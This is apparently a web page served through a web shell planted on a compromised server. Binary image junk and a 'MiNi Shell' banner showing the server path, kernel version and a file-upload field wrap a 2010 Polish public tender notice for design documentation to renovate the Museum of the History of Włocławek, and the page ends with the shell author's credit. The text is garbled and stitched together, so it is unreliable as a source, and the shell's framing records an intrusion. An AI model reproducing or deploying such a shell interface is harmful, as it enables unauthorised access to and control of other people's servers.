JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100908/282544-N-2010.html

<p class="kh_header"><b>Włocławek: WYKONANIE KOMPLETNEJ DOKUMENTACJI PROJEKTOWO-KOSZTORYSOWEJ MODERNIZACJI (REMONTU I ROZBUDOWY) MUZEUM HISTORII WŁOCŁAWKA</b><br>
<b>Numer ogłoszenia: 282544 - 2010; data zamieszczenia: 08.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Ziemi Kujawskiej i Dobrzyńskiej , ul. Słowackiego 1a, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 2323243, faks 054 2323625.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE KOMPLETNEJ DOKUMENTACJI PROJEKTOWO-KOSZTORYSOWEJ MODERNIZACJI (REMONTU I ROZBUDOWY) MUZEUM HISTORII WŁOCŁAWKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo-kosztorysowej modernizacji (remontu i rozbudowy) Muzeum Historii Włocławka we Włocławku, ul. Szpichlerna 19. ZAWARTOŚĆ OPRACOWANIA DOKUMENTACJI PROJEKTOWEJ
Branża budowlana:
1.	Projekt budowlany w zakresie niezbędnym do uzyskania pozwolenia na budowę:
1.1.	Projekt zagospodarowania terenu,
1.2.	Inwentaryzacja budowlana,
1.3.	Projekt budowlany - część architektura,
1.4.	Projekt budowlany - część konstrukcja,
1.5.	Projekt budowlany - część instalacji sanitarnych wewnętrznych, w tym wod-kan, co i cw, wentylacji mechanicznej,
1.6.	Projekt budowlany - część instalacji odprowadzających wodę
1.7.	Projekt budowlany - część instalacji elektrycznych wewnętrznych, w tym instalacja odgromowa, instalacja oświetlenia ewakuacyjnego,
1.8.	Projekt budowlany - część instalacji elektrycznych,
1.9.	Projekt budowlany - instalacja p. poż.
1.10.	Projekt budowlany - mała architektura (z ogrodzeniem),
1.11.	Projekt zieleni 

2.	Projekt wykonawczy:
2.1.	Projekt wykonawczy - część architektura,
2.2.	Projekt wykonawczy - część konstrukcja,
2.3.	Projekt wykonawczy - część instalacji sanitarnych wewnętrznych, w tym wod-kan, co i cw, wentylacja mechaniczna,
2.4.	Projekt wykonawczy - część instalacji odprowadzających wodę
2.5.	Projekt wykonawczy - część izolacji pionowa fundamentów i piwnic
2.6.	Projekt wykonawczy - część instalacji elektrycznych wewnętrznych, w tym instalacja odgromowa, instalacja oświetlenia ewakuacyjnego,
2.7.	Projekt budowlany - część instalacji elektrycznych zewnętrznych,
2.8.	Projekt wykonawczy - instalacja p. poż.
2.9.	Projekt wykonawczy - mała architektura,
2.10.	Projekt wykonawczy zieleni,
2.11.	Projekt aranżacji ekspozycji stałych i przestrzeni magazynowych

3.   Pozostałe opracowania:
3.1.	Przedmiary robót dla wszystkich branż,
3.2.	Kosztorysy inwestorskie dla wszystkich branż,
3.3.	Zbiorcze zestawienie kosztów,
3.4.	Specyfikacje Techniczne Wykonania i Odbioru Robót dla wszystkich branż.
3.5.	Audyt energetyczny obiektów
ZAŁOŻENIA DO PROJEKTU
1.1.	Projektu obejmuje zespół budynków i przestrzeni opisywanych dalej jako A,B,C,D,E,F,G według następującego przyporządkowania:
A - Kamienica, Stary Rynek 14
B - Kamienica, Stary Rynek 15
C - Kamienica, ul. Szpichlerna 19
D - Łącznik wejściowy (hol)
E - Przestrzeń patio
F - Budynek gospodarczo-garażowy
G - Przestrzeń dziedzińca
Plan sytuacyjny zespołu Muzeum Historii Włocławka z zaznaczeniem ww. części składowych stanowi załącznik nr 10 do SIWZ.
1.2.	Zakres projektu uwzględniać ma w szczególności:
a)	wymianę pokryć dachowych i modernizację więźby dachowej budynków A,B,C
b)	wymianę stolarki okiennej budynków A,B,C
c)	naprawę lub wymianę tynków zewn. i wewn. wraz z malowaniem w obrębie wszystkich budynków
d)	wymianę instalacji elektrycznej i oświetlenia,
e)	izolację pionową i osuszenie piwnic wraz z modernizacją istniejącego systemu odwadniania budynków A,B,C
f)	adaptację strychu budynku A na pomieszczenia magazynowe,
g)	adaptacja jednego z pomieszczeń 3 kond. budynku A na pracownię konserwatorską
h)	adaptację strychów budynków B i C na pomieszczenia biurowe,
i)	adaptację pomieszczeń II kondygnacji budynków B i C na pomieszczenia magazynowe
j)	modernizację pomieszczeń sanitarnych w budynkach A i C
k)	likwidację sanitariatu w budynku B z wykorzystaniem uzyskanej przestrzeni na wprowadzenie nowej komunikacji na poddasza budynków B i C 
l)	rozbudowę budynku D do południowej granicy działki z przystosowaniem do funkcji zaplecza sanitarnego, szatni i pokoju socjalnego,
m)	adaptację przestrzeni E na zadaszoną (przeszkloną) klatkę schodową,
n)	przebudowę budynku F - przedłużenie do całej szerokości działki i nadbudowę poddasza z przeznaczeniem na powierzchnię magazynową
o)	zagospodarowanie przestrzeni G na plac działań interaktywnych
p)	dostosowanie dostępności sal ekspozycyjnych przyziemia dla potrzeb osób niepełnosprawnych
1.3.	W przypadku architektury kamienic A, B, C wskazane jest zachowanie w zakresie możliwym substancji zabytkowej. Projekt ma uwzględniać wprowadzenie nowych instalacji niezbędnych dla funkcji muzealnych, biurowych i sanitarnych.
1.4.	Rozbudowa budynku F ma uwzględniać funkcję garażu od ul. Szpichlernej, oraz magazynu gospodarczego w pozostałej części przyziemia oraz magazynu archeologicznego w całości poddasza. Oprócz doprowadzonej instalacji elektrycznej budynek zostanie wyposażony tylko 
w instalację antywłamaniową podłączoną do istniejącej w budynkach A-D .
1.5.	Projekt zagospodarowania przestrzeni G ma uwzględniać funkcje placu publicznego z przystosowaniem do plenerowych działań muzealnych. 
1.6.	W zakresie małej architektury projekt ma uwzględniać przebudowę bramy i schodów od ul. Szpichlernej 
1.7.	Projekty powinny uwzględniać aktualne wymogi oraz nowoczesne materiały i rozwiązania techniczne. Ponadto projekty mają być oparte o wytyczne Zamawiającego.
1.8.	Przed przystąpieniem do projektowania Wykonawca przedłoży Zamawiającemu oraz Delegaturze WUOZ we Włocławku wstępną koncepcję realizacji przedmiotu zamówienia celem jej zaopiniowania. Ponadto realizacja przedmiotu zamówienia będzie obejmowała uzgodniony  z Delegaturą WUOZ we Włocławku program prac konserwatorskich 
w zakresie całości zadania.
1.9.	Ogólne warunki dla realizacji projektu określa Decyzja Nr 22/10 o ustaleniu lokalizacji inwestycji celu publicznego wydana w dniu 22.07.2010 r. przez Prezydenta Miasta Włocławek 
(w posiadaniu Zamawiającego)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5, 71.22.00.00-6, 71.32.00.00-7, 71.42.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy posiadają uprawnienia do wykonania określonej działalności lub czynności. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.(art. 26 ust 2b Pzp) Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia- nie spełnia w oparciu o informacje zawarte w dokumentach wyszczególnionych w rozdziale VII niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch zrealizowanych projektów architektonicznych (budowlanych i wykonawczych) przebudowy lub adaptacji na cele muzealne budynków zabytkowych wpisanych do rejestru zabytków potwierdzonych pozytywną opinią Urzędu Ochrony Zabytków. Ponadto przynajmniej jedna z powyższych realizacji powinna być udokumentowana decyzją pozwolenia na użytkowanie obiektu wydana w ciągu ostatnich 12 miesięcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy dysponujacy osobami posiadającymi uprawnienia w specjalności:
	architektonicznej bez ograniczeń do projektowania i kierowania robotami budowlanymi  związanymi z obiektem budowlanym, 
	konstrukcyjno - budowlanej do projektowania i kierowania robotami budowlanymi związanymi z obiektem budowlanym bez ograniczeń,
	
	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, 	wodociągowych i kanalizacyjnych, bez ograniczeń do projektowania obiektu budowlanego i kierowania robotami budowlanymi,
	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez 	ograniczeń do projektowania obiektu budowlanego i kierowania robotami budowlanymi związanymi z obiektem budowlanym,
Zdolność wykonania zamówienia przez członków zespołu projektowego powinna być potwierdzona aktualnym zaświadczeniem o przynależności do odpowiedniej izby zawodowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie moga ubiegać się Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, przy założeniu, że zapłata za wykonanie zamówienia dokonywana będzie zgodnie z treścią wzoru umowy stanowiącego załącznik nr 2 do niniejszej SIWZ i że wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji zamówienia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZMIANY
1.	Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku
do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek 
z następujących sytuacji:
1.1.	przedłużenie terminu zakończenia przedmiotu umowy może nastąpić w przypadkach m.in.:
a)	rozszerzenia zakresu projektu wynikającego z warunków gestorów sieci i decyzji administracyjnych,
b)	zwłoki instytucji opiniujących i uzgadniających ponad łączny czas wykonania przypisanych im czynności o czas równy tej zwłoce,
1.2.	zmiany wynagrodzenia w przypadku ustawowej zamiany podatku VAT - w wyniku zmiany stawki podatku od towarów i usług na Przedmiot umowy, ceny brutto określone w umowie ulegną odpowiedniej zmianie, w taki sposób, aby wynikające z umowy ceny netto pozostały niezmienione. Wynikające z ewentualnych zmian stawek podatku VAT, zmiany cen brutto będą wymagały wprowadzenia poprzez zawarcie stosownego aneksu do niniejszej umowy
1.3.	Wszelkie zmiany umowy wymagają pod rygorem nieważności obopólnej zgody, formy pisemnej i podpisania przez obie strony.
1.4.	Z wnioskiem o zmianę treści umowy może wystąpić zarówno Wykonawca, jak
i Zamawiający, w przypadku wprowadzania zmian każdorazowo Zamawiający musi wyrazić zgodę pisemną na wprowadzenie zmian.

2.  Procedura wprowadzania zmian przez wnioskodawcę: wniosek każdorazowo musi zawierać:
Opis proponowanej zmiany
Termin wprowadzenia zmian
 Wniosek o zmianę składany przez Wykonawcę musi wpłynąć do Zamawiającego 
 w terminie minimum 5 dni przed planowanym wprowadzeniem zmian, pisemnie 
 do sekretariatu Zamawiającego. Wnioski złożone po terminie oraz wnioski nie zawierające       
       elementów opisanych powyżej nie będą rozpatrywane
 Wszelkie zmiany i uzupełnienia treści umowy i jej załączników wymagają formy pisemnej 
 w formie odpowiedniego aneksu do umowy wprowadzonego jedynie na podstawie 
 i w oparciu o zapisy niniejszego punktu 2.
Zmiany mogą dotyczyć tylko zakresu i skutków określonych niniejszą specyfikacją i nie   
        wykluczają praw Zamawiającego i Wykonawcy w zakresie kar umownych, odszkodowań 
        i  odstąpienia od umowy przez strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Ziemi Kujawskiej i Dobrzyńskiej, 87-800 Włocławek, ul. Słowackiego 1a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2010 godzina 10:00, miejsce: Muzeum Ziemi Kujawskiej i Dobrzyńskiej, 87-800 Włocławek, ul. Słowackiego 1a - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com